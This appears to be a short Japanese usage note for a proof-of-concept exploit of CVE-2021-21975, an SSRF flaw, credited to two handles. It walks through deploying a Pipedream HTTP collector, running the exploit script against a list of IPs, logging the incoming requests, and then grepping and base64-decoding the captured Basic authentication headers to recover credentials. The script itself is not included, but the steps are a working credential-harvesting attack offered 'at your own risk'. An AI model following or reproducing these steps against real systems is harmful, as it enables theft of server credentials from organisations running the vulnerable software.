
#SSRF-POC - SSRFから資格情報漏洩へ
#最初にpdクライアントを設定してください。
#次に ./pd deploy http-new-requests を実行します。
#次に、スクリプト内のpipedream httpリクエスト(例: Randomstring.m.pipedream.net)を置き換えてください。
#これを別のターミナルで実行します - ./pd logs new-requests | tee -a req.txt
#そして今度は別のターミナルでこれを実行します - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"これは、脆弱性が公開された際に数か月前に作成された初期の概念実証です。自己責任で使用してください。" :V
#クレジット @wabaf3t @D0rkerDevil